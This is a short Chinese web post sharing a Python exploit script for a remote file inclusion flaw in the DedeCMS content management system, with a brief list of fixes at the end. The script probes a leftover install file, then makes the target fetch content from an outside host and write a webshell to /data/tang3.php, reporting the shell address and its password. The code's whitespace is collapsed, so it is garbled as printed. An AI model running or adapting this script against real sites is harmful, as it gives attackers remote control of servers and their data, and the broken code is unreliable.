最新python织梦dedecms远程执行脚本

    热度:℃      作者:wdzzz.com

织梦CMS是使用最多的CMS之 一,但是漏洞也非常多。分享一款python写的织梦远程文件包含漏洞。修复此漏洞方法,请见文章底部。

织梦CMS漏洞代码

#!/usr/bin/envpython#coding=utf-8#Joseph(小续)importrequestsimportsysimportredefmain():try:url="http://"+sys.argv[1].strip('http://')exceptIndexError:print'''poc:dede.py[url]http://www.baidu.com/[/url]'''payload="/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php"urlpoc=url+payloadcode=requests.get(urlpoc).status_codeifcode==200:printu"恭喜存在此漏洞"printu"Ongoingattacks--->>>>>"exploit(url)passelse:printu"sorry漏洞正在挣扎"passdefexploit(url):urlpoc=url+"/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=https://www.tuiedu.org/"htmlcontent=requests.get(urlpoc).contentProbe=re.compile(r'存在')ifProbe.findall(htmlcontent):printu'''ver:getshell成功shell:url+/data/tang3.php?a=0密码为:c'''passelse:printu"请看远程地址是否已经不可用"passif__name__=='__main__':main()

修复方法

1、建议安装完成后,删除(改名)install文件夹。

2、给data文件夹改名,或者移动位置。

3、到织梦后台,升级到最新的版本

4、官方网站下载最新补丁包手动更新到最新版本。

5、不用谢!

相关专题
来源:本文由互联网原创撰写,欢迎分享本文,转载请保留出处和链接!部分信息来源互联网,如有侵权,请联系删除。